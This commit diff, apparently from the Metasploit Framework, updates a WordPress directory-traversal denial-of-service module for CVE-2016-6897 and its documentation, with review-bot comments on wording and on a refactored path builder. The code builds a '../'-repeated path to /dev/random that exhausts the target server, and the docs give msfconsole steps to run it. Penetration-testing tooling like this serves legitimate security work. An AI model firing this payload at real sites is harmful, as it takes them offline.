Update directory traversal DoS module and docs

bug/bundler_fix
root 2017-05-29 00:30:23 +02:00
parent 9b9d2f2345
commit 72a5142e37
2 changed files with 14 additions and 9 deletions


@ -1,5 +1,12 @@
This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated users to cause a denial of service (with /dev/random read operations).
## Verification
## Vulnerable Application
This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin (https://core.trac.wordpress.org/changeset/38168) function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated users to cause a denial of service (with /dev/random read operations).
You can find the vulnerable application from the official website:
https://wordpress.org/download/release-archive/
## Verification Steps
1. Start msfconsole
2. Do: ```use auxiliary/dos/http/wordpress_directory_traversal_dos.rb```
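Review bot: In the new Vulnerable Application paragraph, the changeset URL sits in parentheses between `wp_ajax_update_plugin` and "function", which breaks the sentence and does not say what the link points to. Move it into its own sentence that states what the changeset is, give "Allows remote authenticated users ..." a subject, and spell the product "WordPress". The paragraph also describes only the CSRF, while the commit title and module name call this a directory traversal DoS; one sentence on how the traversal reaches /dev/random would tie the two together.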
@ -11,6 +18,9 @@ This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp
8. WordPress website should be down
## Scenarios
### Wordpress 4.5.3 on Linux Mint 17.3
https://wordpress.org/wordpress-4.5.3.tar.gz
```
msf auxiliary(wordpress_directory_traversal_dos) > exploit
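Review bot: The tarball URL added under "### Wordpress 4.5.3 on Linux Mint 17.3" is a bare line with no label, so a reader cannot tell whether it is the exact build that was tested or only a download pointer. Label it, for example "Tested release: https://wordpress.org/wordpress-4.5.3.tar.gz", and use the "WordPress" spelling in the heading.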


@ -27,8 +27,7 @@ class MetasploitModule < Msf::Auxiliary
[
['CVE', '2016-6897'],
['EDB', '40288'],
['OVEID', 'OVE-20160712-0036'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2016-6897']
['OVEID', 'OVE-20160712-0036']
],
))
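Review bot: With the NVD line removed, the references array no longer has any `URL` entry. Dropping it is reasonable, since `['CVE', '2016-6897']` already identifies the same record, but the docs change in this commit cites https://core.trac.wordpress.org/changeset/38168 and that link is not duplicated by any other reference here. Consider adding it as a `['URL', ...]` entry so the module and its documentation point to the same sources, and say in the commit message why the NVD link was dropped.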
@ -127,11 +126,7 @@ class MetasploitModule < Msf::Auxiliary
return
end
path = '/'
1.upto(depth) do |i|
path += '../'
end
path += 'dev/random'
path = "/#{'../' * depth}dev/random"
while starting_thread < rlimit do
ubound = [rlimit - (starting_thread - 1), thread_count].min
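Review bot: The one-line form `path = "/#{'../' * depth}dev/random"` is not equivalent to the removed loop when `depth` is negative: `1.upto(depth)` simply ran zero times and left the path as "/dev/random", whereas `'../' * depth` raises ArgumentError. Nothing in the visible lines bounds `depth`, so either validate it before this point or clamp it here, for example `'../' * [depth, 0].max`, and add a short comment noting that the result is "/" followed by `depth` copies of "../" and then "dev/random".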